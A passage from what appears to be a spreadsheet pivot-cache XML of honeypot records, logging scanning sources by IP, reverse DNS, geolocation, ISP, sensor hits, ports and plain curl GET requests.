    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:74f1:437a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3386"/>
    <x v="3386"/>
    <s v="122-117-41-146.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T08:19:52"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T08:19:52"/>
    <n v="700"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H41&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;780&amp;&amp;23&amp;&amp;63205&amp;&amp;80&amp;&amp;9100"/>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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:2992"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3387"/>
    <x v="3387"/>
    <s v="NA&amp;&amp;114-33-46-68.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T08:19:44"/>
    <d v="2023-12-04T05:35:00"/>
    <d v="2025-04-03T08:19:44"/>
    <n v="567"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;41829&amp;&amp;23&amp;&amp;9100&amp;&amp;80"/>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None"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:2e44"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3388"/>
    <x v="3388"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T08:17:44"/>
    <d v="2025-04-02T22:45:12"/>
    <d v="2025-04-03T08:17:44"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Samrāla"/>
    <s v="1257503"/>
    <s v="NA"/>
    <s v="30.836"/>
    <s v="76.1932"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:97be"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3389"/>
    <x v="3389"/>
    <s v="NA&amp;&amp;125-228-37-189.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T08:17:38"/>
    <d v="2023-08-04T18:42:00"/>
    <d v="2025-04-03T08:17:38"/>
    <n v="3861"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;10093&amp;&amp;23&amp;&amp;50920&amp;&amp;33808&amp;&amp;33819&amp;&amp;9100"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de4:25bd"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3390"/>
    <x v="3390"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T08:11:19"/>
    <d v="2025-04-03T08:11:19"/>
    <d v="2025-04-03T08:11:19"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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3d02:a521"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3391"/>
    <x v="3391"/>
    <s v="NA&amp;&amp;122-117-122-47.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T08:10:45"/>
    <d v="2023-10-06T22:23:00"/>
    <d v="2025-04-03T08:10:45"/>
    <n v="4216"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;29422&amp;&amp;9100&amp;&amp;NA"/>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login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:7a2f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3392"/>
    <x v="3392"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T08:02:19"/>
    <d v="2023-08-03T19:44:00"/>
    <d v="2025-04-03T08:02:19"/>
    <n v="637"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;9546&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="23"/>
    <s v="Zaporizhzhia"/>
    <s v="Zaporizhzhia Raion"/>
    <s v="Zaporizhzhya"/>
    <s v="687700"/>
    <s v="NA"/>
    <s v="47.8388"/>
    <s v="35.1396"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e76:4aee"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3393"/>
    <x v="3393"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T07:59:36"/>
    <d v="2025-04-03T07:59:36"/>
    <d v="2025-04-03T07:59:36"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:4631"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3394"/>
    <x v="3394"/>
    <s v="NA&amp;&amp;125-228-195-225.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T07:55:06"/>
    <d v="2023-11-30T19:50:27"/>
    <d v="2025-04-03T07:55:06"/>
    <n v="820"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;5352&amp;&amp;23&amp;&amp;58004&amp;&amp;20670&amp;&amp;46753"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de4:c3e1"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3395"/>
    <x v="3395"/>
    <s v="59-126-83-83.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T07:36:11"/>
    <d v="2023-08-19T22:11:32"/>
    <d v="2025-04-03T07:36:11"/>
    <n v="877"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_SMB_H42&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;445&amp;&amp;8981&amp;&amp;23&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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3b7e:5353"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3396"/>
    <x v="3396"/>
    <s v="host109-4-32-195.dimensionesrl.eu&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T07:33:26"/>
    <d v="2024-05-04T22:18:00"/>
    <d v="2025-04-03T07:33:26"/>
    <n v="2178"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6920&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
